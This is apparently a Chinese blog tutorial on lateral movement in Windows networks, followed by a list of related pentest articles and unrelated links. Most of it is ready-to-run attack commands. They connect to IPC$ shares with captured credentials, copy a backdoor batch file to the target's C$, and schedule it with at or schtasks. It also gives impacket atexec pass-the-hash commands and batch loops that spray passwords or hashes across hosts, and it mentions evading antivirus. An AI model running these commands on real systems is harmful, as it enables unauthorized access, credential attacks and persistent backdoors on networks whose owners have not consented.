内网渗透-横向移动($IPC&at&schtasks)
内网渗透-横向移动
#建立ipc连接并将后门添加至计划任务
前置条件:获取到某域主机权限->得到明文或者hash,通过信息收集到的用户列表当做用户名字典->用得到的密码明文当做密码字典
本次移动流程:尝试建立连接(ipc)->创建计划任务(at|schtasks)->执行命令,上传后门
什么是IPC?
IPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
#建立ipc常见错误代码
5:拒绝访问,可能需要提权
52:网络问题
53:端口未开放,未开机,防火墙拦截
67:本地lanmanworkstation服务未启动,目标删除了ipc$
1219:提供的凭据和已存在的凭据集冲突,说明已经建立ipc$,需要先删除
1326:账号密码错误
1792:目标NetLogon服务未启动
2242:用户密码过期,目标有账号策略,强制定期更改密码
#失败的原因
目标系统不是NT或者以上的操作系统
对方没有打开ipc$
139 445端口未开启或被拦截
输出命令,账号密码错误
建立ipc连接利用流程
1.建立ipc链接到目标主机(前提主机开放135 445端口)
工作组环境:
net use \\192.168.xx.xx\ipc$ "password" /user:"administrator"
域内环境:
net use \\192.168.xx.xx\ipc$ "password" /user:xxx.com\"administrator"
2.拷贝要执行的命令脚本到目标主机
copy \\192.168.xx.xx\c$\1.bat 1.bat
copy 1.bat \\192.168.xx.xx\c$ dir \\192.168.x.xx\c$\ #查看目标主机文件
3.查看目标时间,创建计划任务(at,schtasks)定时执行拷贝到的脚本
net time \\192.168.xx.xx #查看时间
at在windows版本小于2012下使用
at \\192.168.xx.xx 15:32 c:\1.bat #在15:32执行c盘下的1.bat
schtasks 在windows版本大于等于windows2012下使用
shctasks /create /s 192.168.xx.xx /run "system" /tn adduser /scDAILY /tr c:\1.bat /F #创建adduser任务对应批处理脚本 schtasks /run /s 192.168.xx.xx /tn adduser /i #运行adduser任务 schtasks /delete /s 192.168.xx.xx /tn adduser /f #删除adduser任务
4.删除ipc连接
net use \\192.168.xx.xx\ipc$ /delete net view xx.xx.xx.xx #查看对方共享
#利用atexec-impacket进行明文或hash传递
atexec.exe ./administrator:Admin12345@192.168.xx.xx "whoami" #连接本地用户administrator
atexec.exe xxx.com/administrator:Admin12345@192.168.xx.xx "whoami" #连接域用户administrator
atexec.exe -hashes:xxx ./administrator@192.168.xx.xx "whoami" #连接本地用户administrator并进行hash传递执行whoami命令
缺点:由于是第三方工具容易被拦截,需要做免杀处理
#批量利用
#bat批处理命令
For /F %%i in (ips.txt) do net use \\%%i\ipc$ "password" /user:administrator
#单个密码尝试连接多个主机
For /F %%i in(ips.txt) do atexec.exe xxx.com/administrator:password@%%i whoami
#调用atexec.exe用单个密码尝试连接多个主机
For /F %%i in (pass.txt) do atexec.exe xxx.com/administrator:%%i@192.168.xx.xx whoami
##调用atexec.exe用多个密码尝试连接单个主机
For /F %%i in (hash.txt) do atexec.exe -hashes:%%i xxx.com/administrator@192.168.xx.xx whoami
##调用atexec.exe用多个HASH尝试连接单个主机
内网渗透-横向移动($IPC&at&schtasks)的更多相关文章
- 4. 内网渗透之IPC$入侵
IPC$连接 IPC$的概念: IPC$(Internet Process Connection)是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限 ...
- 内网渗透之IPC,远程执行
开启服务 net start Schedule net start wmiApSrv 关闭防火墙 net stop sharedaccess net use \\目标IP\ipc$ "&qu ...
- [原创]K8 Cscan 3.6大型内网渗透自定义扫描器
前言:无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率漏洞时效性1-2天,扫描内网或外网需1 ...
- 内网渗透技巧:判断机器真实外网IP的5种方法总结
在内网渗透中有时需要在某台WEB服务器中留下后门,该机器可以通过内网IP建立IPC连接,但还需要获知外网IP或域名才能访问Wbshell,在无网关权限的情况下,我总结了有如下方法: 1.通过nsloo ...
- 5.内网渗透之PTH&PTT&PTK
---------------------------------------------- 本文参考自三好学生-域渗透系列文章 内网渗透之PTH&PTT&PTK PTH(pass-t ...
- 内网渗透 - 提权 - Windows
MS提权 MS16- MS16- 提权框架 Sherlock 信息收集 ifconfig -a cat /etc/hosts arp -a route -n cat /proc/net/* ping扫 ...
- 内网渗透之vlunstack靶场
前言:vlunstack靶场是由三台虚拟机构成,一台是有外网ip的windows7系统(nat模式),另外两台是纯内网机器(外网ping不通),分别是域控win2008和内网主机win2003,这里就 ...
- 内网渗透测试思路-FREEBUF
(在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...
- 内网渗透 关于GPO
网上有很多讲内网渗透的文章,但看来看去还是一老外的博客给力,博客地址:www.harmj0y.net/blog,看完就明白这里面的很多思路都非常好. 做内网时,有时会碰到目标的机器开防火墙,所有端口基 ...
随机推荐
- Android Studio 安装及配置
安装时的那些事 •相关链接 [1]:无需翻墙的链接 [2]:Android Studio 安装教程 •从安装到放弃??? 初次接触 Android,并知道了开发 Android APP 的软件--An ...
- Mybatis自定义拦截器与插件开发
在Spring中我们经常会使用到拦截器,在登录验证.日志记录.性能监控等场景中,通过使用拦截器允许我们在不改动业务代码的情况下,执行拦截器的方法来增强现有的逻辑.在mybatis中,同样也有这样的业务 ...
- 最小生成树,Prim和Kruskal的原理与实现
文章首先于微信公众号:小K算法,关注第一时间获取更新信息 1 新农村建设 大清都亡了,我们村还没有通网.为了响应国家的新农村建设的号召,村里也开始了网络工程的建设. 穷乡僻壤,人烟稀少,如何布局网线, ...
- Nacos概述及安装
Nacos是什么? 在Spring Cloud中我们使用eureka.consul等做为服务注册中心,使用Spring Cloud Config做为配置中心.而Spring Cloud中,也可以使用n ...
- Spring MVC(七篇)
(一)Spring MVC简介 (二)SpringMVC核心控制器 (三)Spring MVC Controller接口控制器详解(一) (三)Spring MVC Controller接口控制器详解 ...
- CMD控制台(命令提示符)的打开方式
打开CMD的方式 打开+系统+命令提示符 Win键 +R 输入cmd 打开控制台(推荐使用) 在任意的文件夹下面,按住shift键+鼠标右键点击+在此处打开命令行窗口 资源管理器的地址栏前面加上cmd ...
- OAuth2.0理解和用法
现在网络的资料到处都是,很容易搜索到自己想要的答案.但答案通常只能解决自己一部分的问题.如果自己想要有一套自己的解决方案,还得重新撸一遍靠谱. 我需要学下OAuth2.0吗? 没看之前以为OAuth2 ...
- 基于sinc的音频重采样(二):实现
上篇(基于sinc的音频重采样(一):原理)讲了基于sinc方法的重采样原理,并给出了数学表达式,如下: (1) 本文讲如何基于这个数学表达式来做软件实现.软件实现的 ...
- Tony老师带你来看Java设计模式:代理模式
目录 定义 作用 意图 主要解决问题 优缺点 与装饰者模式的区别 结构 从Tony老师来看实现方式 静态代理 动态代理 JDK动态代理的实现 cglib动态代理的实现 定义 为其他对象提供一种代理来控 ...
- Java编程语言学习01-编写第1个Java程序
JVM/JRE/JDK JVMJava虚拟机(Java Virtual Machine)它是运行所有Java程序的虚拟计算机有的java程序会首先被编译为.class的类文件,这种类文件可以在虚拟机上 ...